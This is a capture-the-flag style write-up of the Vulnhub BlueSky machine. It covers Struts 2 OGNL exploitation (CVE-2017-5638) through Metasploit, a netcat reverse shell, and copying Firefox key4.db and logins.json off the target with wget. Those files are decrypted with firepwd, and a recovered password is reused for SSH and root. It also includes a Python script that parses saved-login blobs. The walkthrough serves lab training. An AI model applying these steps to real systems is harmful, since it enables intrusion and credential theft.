NepCodeX



BlueSky Walkthrough – Vulnhub – Writeup


BlueSky is an easy machine from Vulnhub that requires a bit of initial enumeration. Once you have the foothold, however, the machine isn't that difficult. Note that the machine worked in VMware but not in VirtualBox for me. I used Proxy Programmer's video as a reference for the foothold; you can find it at the end of this post.

Link to the machine: https://www.vulnhub.com/entry/bluesky-1,623/


Identify the target

First, we have to identify the IP address of the target machine on the virtual network.

sudo netdiscover -r 192.168.19.0/24
[Screenshot] Target IP address: 192.168.19.147

Scan open ports

Next, we scan the target for open ports and identify the services and versions running on them.

nmap -v -T4 -sC -sV -p- -oN nmap.log 192.168.19.147
[Screenshot] Nmap scan results

The scan shows an Apache Tomcat server running on the target.

Enumerate the Tomcat server

This is the part where I really couldn't get anything out of the Tomcat server itself. From Proxy Programmer's video, I learned that we need to guess at the frameworks deployed on it. Searching for "tomcat" in Metasploit also turned up Struts, a Java EE web framework, and with the help of the video I identified that the vulnerability is in the Struts 2 framework. The bug in question is CVE-2017-5638, an OGNL injection in the Struts 2 Jakarta Multipart parser: a crafted Content-Type header is evaluated as an OGNL expression during error handling, which gives unauthenticated remote code execution as the user running Tomcat.

Github Link: https://github.com/jrrdev/cve-2017-5638/blob/master/exploit/exploit.py

The above exploit works on Python 2 only. Instead, I will use the Metasploit framework to get a reverse shell; Metasploit covers the same CVE with exploit/multi/http/struts2_content_type_ognl.

[Screenshot] msfconsole command history

Although Metasploit reported that the exploit failed (its success check on the HTTP response evidently did not match), the payload did run: a session is waiting in the background.

[Screenshot] Session in background

Since we have a session in the background, I used it to spawn another reverse shell to a netcat listener in my own terminal, because Metasploit shells aren't as stable.

nc -nlvp 9001
[Screenshot] Spawned a reverse shell from Metasploit
[Screenshot] Got a reverse shell

Escalate privileges

Next, I upgraded the reverse shell to a fully interactive TTY. For the steps, see my other blog post:

Upgrade to an intelligent reverse shell

Looking around the user's home directory, there is a .mozilla directory, and inside the Firefox profile are the files key4.db and logins.json.

[Screenshot] .mozilla directory
[Screenshot] key4.db and logins.json

Since the profile contains both key4.db and logins.json, we can decrypt the saved passwords with the firepwd tool. For that, we have to transfer the two files to my local machine. Run the Python web server from the profile directory (it serves the current directory), and stop it with Ctrl-C once the download is done, because anyone on the network can fetch the files while it is running.

# On the target machine: serve the current directory on TCP port 8000
python3 -m http.server
# On my local machine: fetch both files from the target
wget http://192.168.19.147:8000/key4.db
wget http://192.168.19.147:8000/logins.json

Github link to Firepwd: https://github.com/lclevy/firepwd

Install the Python packages the repository lists as requirements, then put the two files in the same directory as firepwd.py. Running it with no options works here because the profile has no master password; if one is set, the tool has to be given it to unwrap the key.

python3 firepwd.py

We got the user's Twitter password.

[Screenshot] Twitter password
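Why both files are needed: logins.json stores each saved login's encryptedUsername and encryptedPassword as base64-encoded DER blobs, and each blob names the NSS key id, the cipher (3DES-CBC) and the IV, while the 3DES key itself is stored in key4.db, encrypted under a key derived from the profile's master password (empty unless the user set one) and the salt in the metaData table. firepwd does exactly this chain. The script below is an added example, not code from this post or from firepwd: it builds a constructed logins.json entry, walks the DER with a small hypothetical parser, and reports the key id, cipher OID, IV and ciphertext length the decryption step would need. It deliberately stops before the 3DES decryption, which requires key4.db and a crypto library.

```python
"""Inspect the encrypted login blobs Firefox stores in logins.json.
Added example (not the post's or firepwd's code); the logins.json below is
constructed inline and the DER helpers are a minimal hypothetical parser."""
import base64
import json

DES_EDE3_CBC = "1.2.840.113549.3.7"  # cipher NSS uses for saved logins
# CKA_ID of the default NSS key. The 3DES key itself lives in key4.db
# (table nssPrivate), encrypted under a key derived from the master
# password (empty by default) and the globalSalt in table metaData.
DEFAULT_KEY_ID = bytes.fromhex("f8000000000000000000000000000001")


def der(tag, payload):
    """Encode one DER TLV with short- or long-form length."""
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def der_oid(dotted):
    """Encode a dotted OID as a DER OBJECT IDENTIFIER (base-128 arcs)."""
    arcs = [int(a) for a in dotted.split(".")]
    body = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        while arc := arc >> 7:
            chunk.insert(0, 0x80 | (arc & 0x7F))
        body += chunk
    return der(0x06, bytes(body))


def decode_oid(body):
    """Decode a DER OBJECT IDENTIFIER body back to dotted form."""
    arcs, cur = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        cur = (cur << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(cur)
            cur = 0
    return ".".join(map(str, arcs))


def parse_der(buf, pos=0):
    """Parse the TLV at buf[pos] -> (tag, value, next_pos); constructed
    tags (bit 0x20, e.g. SEQUENCE) become a list of (tag, value) children."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    value = buf[pos:pos + length]
    if tag & 0x20:
        children, p = [], 0
        while p < len(value):
            t, v, p = parse_der(value, p)
            children.append((t, v))
        value = children
    return tag, value, pos + length


def build_login_blob(key_id, iv, ciphertext):
    """Encode like NSS: SEQUENCE { OCTET STRING keyId,
    SEQUENCE { OID des-ede3-cbc, OCTET STRING iv }, OCTET STRING ct }."""
    alg = der(0x30, der_oid(DES_EDE3_CBC) + der(0x04, iv))
    blob = der(0x30, der(0x04, key_id) + alg + der(0x04, ciphertext))
    return base64.b64encode(blob).decode()


def inspect_login(entry):
    """Per encrypted field, report what the decryption step would need."""
    out = {"hostname": entry["hostname"]}
    for field in ("encryptedUsername", "encryptedPassword"):
        tag, items, _ = parse_der(base64.b64decode(entry[field]))
        if tag != 0x30 or len(items) != 3:
            raise ValueError(f"{field}: unexpected ASN.1 layout")
        key_id, alg, ct = items[0][1], items[1][1], items[2][1]
        out[field] = {
            "key_id": key_id.hex(),           # which key4.db key to unwrap
            "cipher": decode_oid(alg[0][1]),  # expect 1.2.840.113549.3.7
            "iv": alg[1][1].hex(),
            "ciphertext_len": len(ct),        # multiple of the 8-byte block
        }
    return out


# Constructed logins.json (not the target's); ciphertexts are dummy bytes.
SAMPLE_LOGINS = json.dumps({"logins": [{
    "hostname": "https://twitter.com", "encType": 1,
    "encryptedUsername": build_login_blob(DEFAULT_KEY_ID, b"\x11" * 8, b"\xaa" * 16),
    "encryptedPassword": build_login_blob(DEFAULT_KEY_ID, b"\x22" * 8, b"\xbb" * 24),
}]})

if __name__ == "__main__":
    for entry in json.loads(SAMPLE_LOGINS)["logins"]:
        print(json.dumps(inspect_login(entry), indent=2))
```

Point it at a real logins.json by loading the file instead of SAMPLE_LOGINS; if the reported key_id is not f8000000000000000000000000000001, firepwd still needs the matching nssPrivate row from key4.db, and if the IV length or cipher OID differ from the 8-byte 3DES-CBC case, the profile is not using the layout described here.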

Then I checked for password reuse by trying the same password against the SSH service, and it worked.

[Screenshot] SSH login

Now, let’s check the sudo permissions.

[Screenshot] sudo permissions

The user is allowed to run any command as root via sudo, so we can switch to root directly.

[Screenshot] Root access

Walkthrough by Proxy Programmer

[Embedded video] Walkthrough of Proxy Programmer

